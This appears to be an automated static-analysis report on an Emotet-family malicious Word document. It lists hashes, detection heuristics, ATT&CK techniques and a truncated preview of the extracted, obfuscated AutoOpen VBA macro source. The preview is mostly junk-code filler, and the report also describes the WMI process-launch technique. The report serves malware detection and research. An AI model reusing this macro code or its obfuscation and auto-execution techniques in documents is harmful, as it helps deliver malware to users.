Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4b37aca0d46401d6…

MALICIOUS

Office (OLE)

Size: 189.8 KB
Created: 2019-04-30 16:40:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: c9c89bed40ac38d7c622f7de2215b2db
SHA-1: 55001684dc7bc5912cc636264bbfc2bf5b006a0a
SHA-256: 4b37aca0d46401d67a57677fc4189ef354ec63afa9c3312cd076fbe0391b9c6d
Risk Score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains VBA macros with an autoopen function, which is a common technique for Emotet. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates the macro attempts to launch a process via WMI. ClamAV detection also confirms the Emotet family. The macro's intent is to execute a malicious payload, likely a downloader, using the WMI Win32_Process launcher.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6959697-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6959697-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 39898 bytes
SHA-256: f435de1a2d16c5d3d2211aaf9167d2424af8f793a1404dd26ac8ebade68693ac

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "VUAxAUA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jk1DADB"
Attribute VB_Base = "0{C3FB2FD9-D262-45DF-ADA5-7A9824370E19}{24809B5E-DCB4-43F8-9A31-91FC17A235C5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MkGCQ_A"
Attribute VB_Base = "0{3B807447-38EA-4C8F-B056-DD128D073012}{5C86DE9C-55C5-490E-8366-A3885513EC97}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "n1cUGBoA"
Sub autoopen()
   If SABQB4w1 = wAAG1cAo Then
ElseIf VAAAAc = sAUADQAA Then
            SABAUB = Hex(GDAUA4wo + CSng(uBAoQB / Tan(438172782 + 170242108)))
ElseIf XUxAAAQ = nA4AxB_ Then
            jkX_1DA = Atn(189295002) + Int(190766013)
ElseIf AwAGDA = OkADAAZ Then
            vAxA1c = 482445094 + Atn(33888895)
End If
   If oA11xC = cBZBQABG Then
ElseIf tUAQAAGU = wAQX_ADc Then
            MCA1wxU = Hex(bkB_AcC + CSng(JAAAAA / Tan(781555846 + 296431849)))
ElseIf E4ABU_ = aCBUABAU Then
            oBwQAD = Atn(814582981) + Int(991437317)
ElseIf uAQAXUAA = Wc1AAC Then
            wAAGoGZ = 963156523 + Atn(80418687)
End If
QQXDkoAU
   If mAAAAwD = QUAB1_ Then
ElseIf sA4GBA = OUXQAABx Then
            IXZcoQAA = Hex(jAXcoA + CSng(TBA14Q_B / Tan(923817426 + 856469621)))
ElseIf tQkA1AA = EBGoGA Then
            JGQQkA = Atn(886063269) + Int(520724521)
ElseIf lZx4C4A = hQUAQwGA Then
            VCQA4AA = 511509469 + Atn(638073167)
End If
   If JkAQAxAD = sQ4o4_ Then
ElseIf DkG_BB = hA41cD Then
            fX_1AAAB = Hex(wxxAUAo + CSng(UXU1AAw / Tan(388706764 + 857595971)))
ElseIf O_oA1AcA = JBGXAA Then
            i1AAAw4A = Atn(892239837) + Int(163003856)
ElseIf bDDoD_k = zAADAwD Then
            iDwGXA = 471114384 + Atn(838904434)
End If
   If icAQBBcA = NBA_ABA Then
ElseIf QAAABC = dDBAGAZA Then
            OQ_BcA4 = Hex(ukAAUBc + CSng(rBDBAGA / Tan(446230014 + 728525395)))
ElseIf dAkADcw = SXAAACAQ Then
            OUDxZA = Atn(130852837) + Int(436533196)
ElseIf GQAkQCcx = W4AUkAAA Then
            wGAQwoZA = 625532876 + Atn(583301602)
End If
End Sub
Function iAAAxAXA(SUUxA_)
   If bkxAAB = iAAc_BQA Then
ElseIf D1UABAAA = iBCBUoA Then
            VA1Z_Q4A = Hex(q1QBocDA + CSng(FAAUZAQ / Tan(951505267 + 318798705)))
ElseIf fQAAXQA = zBUcDkkc Then
            QAAXGADo = Atn(998653389) + Int(333961660)
ElseIf mAXXQZD = OwU4AA Then
            SxQoAA = 182825331 + Atn(563396236)
End If
   If EDZAGA = RkDwBXA Then
ElseIf wAAGAXD = KkxAADwZ Then
            LAA4_1A = Hex(lA4AUA1 + CSng(UAAUAA / Tan(586807075 + 247227732)))
ElseIf YAcA4A = kBGDoAG Then
            fB1wAkx = Atn(116682791) + Int(422009753)
ElseIf IZxwABCA = z_Q14k Then
            NAA1wc = 395511735 + Atn(187258439)
End If
   If PAADCB = fAkCAQG_ Then
ElseIf pUUA4A = CDQ_4w Then
            NcDDAA = Hex(CkC_XA + CSng(kxAQUZA / Tan(497684038 + 447605628)))
ElseIf lAkAokA = ToAQcGA_ Then
            AAAxQB = Atn(503560580) + Int(289790292)
ElseIf r4ABAcQC = SA1QAA Then
            cUAG41 = 719057046 + Atn(273784545)
End If
Set iAAAxAXA = CVar(SUUxA_)
   If AAcACCB = QAAAwwwU Then
ElseIf uAQB1GGA = wcxkCAc Then
            uD114A = Hex(wQZABxA + CSng(McUZA1U / Tan(230903026 + 975394436)))
ElseIf QUAAAQ = jCXUXxA Then
            KUc1Q4Bx = Atn(467151942) + Int(696460796)
ElseIf sDAAcDQA = ACAUUA Then
            ZQAZA4D = 836423984 + Atn(534068302)
End If
   If bAA1DUB = CB_AABX Then
ElseIf FUAAAUAX = qDADAQ Then
            cAxQAxAA = Hex(PwUAocDB + CSng(zAZXAQ / Tan(690262104 + 350899247)))
ElseIf OkAGAwU = MU
... (truncated)